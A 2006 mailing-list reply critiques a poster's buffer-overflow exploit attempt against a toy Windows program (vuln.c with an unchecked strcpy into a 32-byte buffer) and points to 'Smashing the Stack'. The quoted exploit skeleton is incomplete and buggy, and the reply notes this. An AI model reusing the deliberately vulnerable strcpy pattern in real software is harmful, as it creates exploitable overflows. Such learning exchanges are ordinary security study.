I've never seen anyone use this method for filling a buffer, but:
I don't see the variable "ret" declared anywhere in your code. I just
see it used in the call to memcpy.
sizeof(payload) might not be the best way to get the string length of
the payload. It may be safer to use strlnlen. There is no guarantee that
sizeof(char[84]) will return the length of the string as opposed to
sizeof(char).
You also seem to be misusing your `ptr` variable.
I recommend you read "Smashing the Stack for Fun and Profit":
http://www.phrack.org/show.php?p=49&a=14
The Jabberwock
http://www.tenebrous.com/
laphoo_at_gmail.com wrote:
> Hello, I would like to know a way to debugging a vulnerable program, where I am overwriting the se handler with my address. I have OllyDbg as just in time debugger. If my exploit-buffer reaches the pointer to the next seh record, nothing happens. Now I was trying to put breakpoint instructions 0xcc) as fake pointer but OllyDbg ignored them, or I did something wrong. How is it possible to debug my vulnerable program with OllyDbg, to see where and with which data I overwrote something?
>
> /* cl expl.c (Visual C++ 6.0) */
> #include <stdio.h>
> #include <string.h>
> int main (void)
> {
> char *app[3];
> char payload[84];
> unsigned int ptr = 0xcccccccc;
> memset(payload, 0x00, sizeof payload);
> memset(payload, 0x41, 80);
> memcpy(payload+80, &ret, sizeof (int));
> app[0] = "vuln.exe";
> app[1] = payload;
> app[2] = NULL;
> execve(app[0], app, NULL);
> return 0;
> }
>
>
> /*vuln.c /
> #include <stdio.h>
> #include <string.h>
> int main (int argc, char *argv[])
> {
> char string[32];
> if (argc > 2)
> {
> printf("Usage: %s <string>\n", argv[0]);
> return 0;
> }
> strcpy(string, argv[1]);
> printf("%s", string);
> return 0;
> }
>
> Environment is Windows.XP.SP.2
>
> I am sorry for my bad english.
>
> Regards,
> -- Laphoo
>
>
Received on Mar 20 2006
Intro
